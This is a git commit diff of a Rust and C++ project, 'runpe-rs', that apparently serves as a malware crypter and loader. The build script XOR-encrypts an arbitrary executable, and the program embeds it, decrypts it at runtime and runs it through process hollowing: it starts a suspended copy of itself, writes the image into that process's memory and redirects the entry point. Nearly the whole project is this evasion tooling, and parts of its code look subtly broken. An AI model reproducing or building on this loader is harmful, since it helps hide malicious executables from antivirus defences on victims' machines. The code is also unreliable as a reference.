initial commit
This commit is contained in:
3
.gitignore
vendored
Normal file
3
.gitignore
vendored
Normal file
@@ -0,0 +1,3 @@
|
||||
/target
|
||||
exe/s.exe
|
||||
crypt.bin
|
||||
25
Cargo.lock
generated
Normal file
25
Cargo.lock
generated
Normal file
@@ -0,0 +1,25 @@
|
||||
# This file is automatically @generated by Cargo.
|
||||
# It is not intended for manual editing.
|
||||
version = 4
|
||||
|
||||
[[package]]
|
||||
name = "cc"
|
||||
version = "1.2.30"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "deec109607ca693028562ed836a5f1c4b8bd77755c4e132fc5ce11b0b6211ae7"
|
||||
dependencies = [
|
||||
"shlex",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "runpe-rs"
|
||||
version = "0.1.0"
|
||||
dependencies = [
|
||||
"cc",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "shlex"
|
||||
version = "1.3.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64"
|
||||
9
Cargo.toml
Normal file
9
Cargo.toml
Normal file
@@ -0,0 +1,9 @@
|
||||
[package]
|
||||
name = "runpe-rs"
|
||||
version = "0.1.0"
|
||||
edition = "2024"
|
||||
|
||||
[dependencies]
|
||||
|
||||
[build-dependencies]
|
||||
cc = "1.2.30"
|
||||
24
build.rs
Normal file
24
build.rs
Normal file
@@ -0,0 +1,24 @@
|
||||
use std::{fs, path::Path};
|
||||
|
||||
fn main() {
|
||||
cc::Build::new()
|
||||
.cpp(true)
|
||||
.file("cpp/run_pe.cpp")
|
||||
.compile("peffi");
|
||||
|
||||
let in_path = Path::new("exe/s.exe");
|
||||
|
||||
let key = 0x42;
|
||||
|
||||
let mut bytes = fs::read(in_path).expect("failed to read input");
|
||||
xor_crypt(bytes.as_mut_slice(), key);
|
||||
|
||||
let out_path = Path::new("crypt.bin");
|
||||
fs::write(out_path, bytes).expect("failed to write");
|
||||
}
|
||||
|
||||
fn xor_crypt(input: &mut [u8], key: u8) {
|
||||
for byte in input.iter_mut() {
|
||||
*byte ^= key;
|
||||
}
|
||||
}
|
||||
93
cpp/run_pe.cpp
Normal file
93
cpp/run_pe.cpp
Normal file
@@ -0,0 +1,93 @@
|
||||
#include <iostream> // Standard C++ library for console I/O
|
||||
#include <string> // Standard C++ Library for string manip
|
||||
|
||||
#include <Windows.h> // WinAPI Header
|
||||
#include <TlHelp32.h> //WinAPI Process API
|
||||
|
||||
|
||||
// use this if you want to read the executable from disk
|
||||
HANDLE MapFileToMemory(LPCSTR filename)
|
||||
{
|
||||
std::streampos size;
|
||||
std::fstream file(filename, std::ios::in | std::ios::binary | std::ios::ate);
|
||||
if (file.is_open())
|
||||
{
|
||||
size = file.tellg();
|
||||
|
||||
char* Memblock = new char[size]();
|
||||
|
||||
file.seekg(0, std::ios::beg);
|
||||
file.read(Memblock, size);
|
||||
file.close();
|
||||
|
||||
return Memblock;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
extern "C" int RunPortableExecutable(void* Image)
|
||||
{
|
||||
IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
|
||||
IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
|
||||
IMAGE_SECTION_HEADER* SectionHeader;
|
||||
|
||||
PROCESS_INFORMATION PI;
|
||||
STARTUPINFOA SI;
|
||||
|
||||
CONTEXT* CTX;
|
||||
|
||||
DWORD* ImageBase; //Base address of the image
|
||||
void* pImageBase; // Pointer to the image base
|
||||
|
||||
int count;
|
||||
char CurrentFilePath[1024];
|
||||
|
||||
DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
|
||||
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize
|
||||
|
||||
GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
|
||||
|
||||
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
|
||||
{
|
||||
ZeroMemory(&PI, sizeof(PI)); // Null the memory
|
||||
ZeroMemory(&SI, sizeof(SI)); // Null the memory
|
||||
|
||||
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
|
||||
CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
|
||||
//process in suspended state, for the new image.
|
||||
{
|
||||
// Allocate memory for the context.
|
||||
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
|
||||
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
|
||||
|
||||
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
|
||||
{
|
||||
// Read instructions
|
||||
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
|
||||
|
||||
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
|
||||
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
// Write the image to the process
|
||||
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
|
||||
|
||||
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
|
||||
{
|
||||
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
|
||||
|
||||
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
|
||||
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
|
||||
}
|
||||
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
|
||||
LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
|
||||
|
||||
// Move address of entry point to the eax register
|
||||
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
|
||||
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
|
||||
ResumeThread(PI.hThread); //´Start the process/call main()
|
||||
|
||||
return 0; // Operation was successful.
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
1
cpp/run_pe.h
Normal file
1
cpp/run_pe.h
Normal file
@@ -0,0 +1 @@
|
||||
extern "C" int RunPortableExecutable(void* Image);
|
||||
18
src/main.rs
Normal file
18
src/main.rs
Normal file
@@ -0,0 +1,18 @@
|
||||
use crate::runpe::run_portable_executable;
|
||||
|
||||
mod runpe;
|
||||
|
||||
fn xor_crypt(input: &mut [u8], key: u8) {
|
||||
for byte in input.iter_mut() {
|
||||
*byte ^= key;
|
||||
}
|
||||
}
|
||||
|
||||
static BYTES: &[u8] = include_bytes!("crypt.bin");
|
||||
|
||||
fn main() {
|
||||
let mut bytes = BYTES.clone();
|
||||
xor_crypt(&mut bytes, 0x42);
|
||||
|
||||
run_portable_executable(bytes).unwrap();
|
||||
}
|
||||
19
src/runpe.rs
Normal file
19
src/runpe.rs
Normal file
@@ -0,0 +1,19 @@
|
||||
extern "C" {
|
||||
fn RunPortableExecutable(Image: *mut std::ffi::c_void) -> i32;
|
||||
}
|
||||
|
||||
pub fn run_portable_executable(image: &[u8]) -> Result<i32, &'static str> {
|
||||
if image.is_empty() {
|
||||
return Err("Empty byte slice passed");
|
||||
}
|
||||
|
||||
let ptr = image.as_ptr() as *mut c_void;
|
||||
|
||||
let result = unsafe { RunPortableExecutable(ptr) };
|
||||
|
||||
if result < 0 {
|
||||
Err("RunPortableExecutable failed")
|
||||
} else {
|
||||
Ok(result)
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user